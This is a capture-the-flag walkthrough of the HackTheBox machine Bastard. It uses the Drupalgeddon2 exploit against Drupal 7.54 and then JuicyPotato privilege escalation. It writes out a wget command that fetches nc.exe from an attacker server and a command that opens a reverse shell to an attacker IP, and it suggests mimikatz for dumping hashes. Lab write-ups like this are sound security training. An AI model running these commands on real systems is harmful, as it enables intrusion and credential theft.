Bastard HTB Walkthrough
Hello Everyone. This is my writeup for the machine Bastard in HackTheBox.
We already know that it is a windows machine. Let’s start scanning and enumerating using nmap.
nmap -Pn -T4 -A 10.10.10.9
-Pn : Disables host discovery which is enabled by default
-T4: Faster scan time
-A: Enables OS and version detection, scans ports using common nmap scripts for specific vulnerabilities and performs traceroute.
We have ports 80 and 135 open with http and msrpc services running on them respectively.
Within port 80, nmap has also found that there are 36 disallowed entries in robots.txt along with the directory paths.
This is good news!
If nmap is able to enumerate robots.txt file, we should be able to access it in the browser.
And here we are, these are the directories and files that may have interesting data.
We will browse them one by one and see if anything interesting pops up.
Meanwhile let’s also check the contents of http://10.10.10.9 .
We have a basic login page here. Default credentials do not work, so looks like some more enumeration will be required.
As we browse through the directories and files listed in robots.txt, we come across information disclosure.
A simple google search shows that Drupal is a CMS which is being used by this machine. Let’s search for any potential exploits related to Drupal 7.54.
Looks like we have a Remote Code Execution exploit for this version of Drupal!
We will read through the exploit to understand how it works and also how we execute it.
Since the original exploit is in github, we can check out https://github.com/dreadlocked/Drupalgeddon2/.
As we read through the README.md file, we find out some edits required in the exploit for version < 7.58 and a windows target.
In the exploit code, let’s incorporate the required changes.
Change to false as we have a windows target. Also, let’s double check if we are able to browse http://10.10.10.9/user/password.
Yes, it is accessible. Let’s execute the script as mentioned in the exploit:
ruby 44449.rb http://10.10.10.9
We have a shell now. Let’s get some basic info about this machine and our current user.
Clearly we aren’t a system user or Administrator and we will need to do privilege escalation. Also, we are unable to change directories, so we will not be able to access the user flag.
Let’s check our user privileges.
We have SeImpersonatePrivilege Enabled which means that we will be able to exploit it using JuicyPotato.
Let’s enumerate the OS and processor details.
Great, we have all the required information needed to exploit using JuicyPotato.
Have a netcat listener running and use your ip and the listening port for incoming connections in the below exploit.
nc -lvp 4443 (Any port can be used)
We need to have nc in order to use this exploit so start a http server using below command.
python -m SimpleHTTPServer 8000 (Any port can be used)
Import the nc.exe file into the target using wget.
wget http://<attacker ip>:8000/nc.exe
Now run the exploit as shown below.
JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a “/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe <attacker ip> 4443” -t * -c {9B1F122C-2982–4e91-AA8B-E071D54F2A4D}
Wohoo! We finally are a system user and should be able to browse to the directories with the user and root flag.
We have our user flag now. Let’s get the root flag as well.
We can now perform post exploitation steps using tools such as mimikatz to dump NTLM hashes and get credentials.
